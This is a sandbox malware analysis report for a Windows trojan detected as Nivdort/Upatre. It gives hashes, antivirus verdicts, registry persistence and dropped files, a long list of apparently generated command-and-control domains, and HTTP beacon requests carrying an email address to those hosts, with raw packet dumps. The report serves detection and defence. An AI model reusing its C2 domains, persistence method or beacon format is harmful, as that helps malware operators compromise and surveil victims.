Analysis | #totalhash

Analysis Date	2015-08-12 20:56:09
MD5	d6cd64a185269790c5ac60ace1446c01
SHA1	90b3e7ca32ca69e1b2c635fc3222d55bf051664b

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: 65ab58ed39d82ca9febff77086099cff sha1: d4d7096e16368f358a92cad05399e46ac14478de size: 301568
Section	.rdata md5: 27cd77fa390a50c6da8c2f031c9d5dac sha1: cbc641a1ffce01666e7fd44cc026e0b52e3afe01 size: 34304
Section	.data md5: bccac870f185d3a2f1e2a81022c9afbf sha1: 6fc2a9a6e2e3bd2c095f3fe8231fdf1a3065fc2b size: 99328
Timestamp	2014-10-30 09:50:11
Packer	Microsoft Visual C++ ?.?
PEhash	8a061ab750afc6ee824aa218cf6c7c0316dfcef0
IMPhash	6b17176fedd76d9ad4b16a4331c6ef8b
AV	CA (E-Trust Ino)	no_virus
AV	F-Secure	Gen:Variant.Symmi.22722
AV	Dr. Web	Trojan.DownLoader11.44050
AV	ClamAV	Win.Trojan.Agent-810200
AV	Arcabit (arcavir)	Gen:Variant.Symmi.22722
AV	BullGuard	Gen:Variant.Symmi.22722
AV	Padvish	no_virus
AV	VirusBlokAda (vba32)	no_virus
AV	CAT (quickheal)	Trojan.Dynamer.AC3
AV	Trend Micro	TSPY_NIVDORT.SMB
AV	Kaspersky	Trojan.Win32.Generic
AV	Zillya!	no_virus
AV	Emsisoft	Gen:Variant.Symmi.22722
AV	Ikarus	Trojan.FBAccountLock
AV	Frisk (f-prot)	no_virus
AV	Authentium	W32/Wonton.B.gen!Eldorado
AV	MalwareBytes	Trojan.Zbot.WHE
AV	MicroWorld (escan)	Gen:Variant.Symmi.22722
AV	Microsoft Security Essentials	TrojanSpy:Win32/Nivdort.BD
AV	K7	Trojan ( 004cb2771 )
AV	BitDefender	Gen:Variant.Symmi.22722
AV	Fortinet	W32/Agent.VNC!tr
AV	Symantec	Downloader.Upatre!g15
AV	Grisoft (avg)	Win32/Cryptor
AV	Eset (nod32)	Win32/Agent.VNC
AV	Alwil (avast)	Downloader-TLD [Trj]
AV	Ad-Aware	Gen:Variant.Symmi.22722
AV	Twister	Trojan.Generic.zndj
AV	Avira (antivir)	TR/ATRAPS.Gen2
AV	Mcafee	Trojan-FEMT!D6CD64A18526
AV	Rising	no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PC Credential Authentication ➝ C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe
Creates File	C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe
Creates Process	C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe

Creates File	C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\ylnilnkqahj.exe
Creates File	C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.zvstn
Creates File	\Device\Afd\Endpoint
Creates Process	WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe"

Network Details:

DNS	machinecontrol.net Type: A 63.247.142.64
DNS	foreigncontrol.net Type: A 195.22.26.254
DNS	foreigncontrol.net Type: A 195.22.26.231
DNS	foreigncontrol.net Type: A 195.22.26.252
DNS	foreigncontrol.net Type: A 195.22.26.253
DNS	childrenmatter.net Type: A 162.144.16.48
DNS	familytogether.net Type: A 104.219.41.65
DNS	childrencontrol.net Type: A 95.211.230.75
DNS	becausespent.net Type: A
DNS	expecttogether.net Type: A
DNS	becausetogether.net Type: A
DNS	expectcontrol.net Type: A
DNS	becausecontrol.net Type: A
DNS	personmatter.net Type: A
DNS	machinematter.net Type: A
DNS	personspent.net Type: A
DNS	machinespent.net Type: A
DNS	persontogether.net Type: A
DNS	machinetogether.net Type: A
DNS	personcontrol.net Type: A
DNS	suddenmatter.net Type: A
DNS	foreignmatter.net Type: A
DNS	suddenspent.net Type: A
DNS	foreignspent.net Type: A
DNS	suddentogether.net Type: A
DNS	foreigntogether.net Type: A
DNS	suddencontrol.net Type: A
DNS	whethermatter.net Type: A
DNS	rightmatter.net Type: A
DNS	whetherspent.net Type: A
DNS	rightspent.net Type: A
DNS	whethertogether.net Type: A
DNS	righttogether.net Type: A
DNS	whethercontrol.net Type: A
DNS	rightcontrol.net Type: A
DNS	figurematter.net Type: A
DNS	thoughmatter.net Type: A
DNS	figurespent.net Type: A
DNS	thoughspent.net Type: A
DNS	figuretogether.net Type: A
DNS	thoughtogether.net Type: A
DNS	figurecontrol.net Type: A
DNS	thoughcontrol.net Type: A
DNS	picturematter.net Type: A
DNS	cigarettematter.net Type: A
DNS	picturespent.net Type: A
DNS	cigarettespent.net Type: A
DNS	picturetogether.net Type: A
DNS	cigarettetogether.net Type: A
DNS	picturecontrol.net Type: A
DNS	cigarettecontrol.net Type: A
DNS	familymatter.net Type: A
DNS	childrenspent.net Type: A
DNS	familyspent.net Type: A
DNS	childrentogether.net Type: A
DNS	familycontrol.net Type: A
DNS	eithermatter.net Type: A
DNS	englishmatter.net Type: A
DNS	eitherspent.net Type: A
DNS	englishspent.net Type: A
DNS	eithertogether.net Type: A
DNS	englishtogether.net Type: A
DNS	eithercontrol.net Type: A
DNS	englishcontrol.net Type: A
DNS	expectfather.net Type: A
DNS	becausefather.net Type: A
DNS	expectapple.net Type: A
DNS	becauseapple.net Type: A
DNS	expectbuilt.net Type: A
DNS	becausebuilt.net Type: A
DNS	expectcarry.net Type: A
DNS	becausecarry.net Type: A
DNS	personfather.net Type: A
DNS	machinefather.net Type: A
DNS	personapple.net Type: A
DNS	machineapple.net Type: A
DNS	personbuilt.net Type: A
DNS	machinebuilt.net Type: A
DNS	personcarry.net Type: A
DNS	machinecarry.net Type: A
DNS	suddenfather.net Type: A
DNS	foreignfather.net Type: A
DNS	suddenapple.net Type: A
DNS	foreignapple.net Type: A
DNS	suddenbuilt.net Type: A
DNS	foreignbuilt.net Type: A
DNS	suddencarry.net Type: A
DNS	foreigncarry.net Type: A
HTTP GET	http://machinecontrol.net/index.php?email=liana1_popescu@yahoo.com&method=post&len User-Agent:
HTTP GET	http://foreigncontrol.net/index.php?email=liana1_popescu@yahoo.com&method=post&len User-Agent:
HTTP GET	http://childrenmatter.net/index.php?email=liana1_popescu@yahoo.com&method=post&len User-Agent:
HTTP GET	http://familytogether.net/index.php?email=liana1_popescu@yahoo.com&method=post&len User-Agent:
HTTP GET	http://childrencontrol.net/index.php?email=liana1_popescu@yahoo.com&method=post&len User-Agent:
Flows TCP	192.168.1.1:1031 ➝ 63.247.142.64:80
Flows TCP	192.168.1.1:1032 ➝ 195.22.26.254:80
Flows TCP	192.168.1.1:1033 ➝ 162.144.16.48:80
Flows TCP	192.168.1.1:1034 ➝ 104.219.41.65:80
Flows TCP	192.168.1.1:1035 ➝ 95.211.230.75:80

Raw Pcap

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6961 6e61315f 706f7065   mail=liana1_pope
0x00000020 (00032)   73637540 7961686f 6f2e636f 6d266d65   scu@yahoo.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206d61    close..Host: ma
0x00000070 (00112)   6368696e 65636f6e 74726f6c 2e6e6574   chinecontrol.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6961 6e61315f 706f7065   mail=liana1_pope
0x00000020 (00032)   73637540 7961686f 6f2e636f 6d266d65   scu@yahoo.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a20666f    close..Host: fo
0x00000070 (00112)   72656967 6e636f6e 74726f6c 2e6e6574   reigncontrol.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6961 6e61315f 706f7065   mail=liana1_pope
0x00000020 (00032)   73637540 7961686f 6f2e636f 6d266d65   scu@yahoo.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206368    close..Host: ch
0x00000070 (00112)   696c6472 656e6d61 74746572 2e6e6574   ildrenmatter.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6961 6e61315f 706f7065   mail=liana1_pope
0x00000020 (00032)   73637540 7961686f 6f2e636f 6d266d65   scu@yahoo.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206661    close..Host: fa
0x00000070 (00112)   6d696c79 746f6765 74686572 2e6e6574   milytogether.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6961 6e61315f 706f7065   mail=liana1_pope
0x00000020 (00032)   73637540 7961686f 6f2e636f 6d266d65   scu@yahoo.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206368    close..Host: ch
0x00000070 (00112)   696c6472 656e636f 6e74726f 6c2e6e65   ildrencontrol.ne
0x00000080 (00128)   740d0a0d 0a                           t....

Strings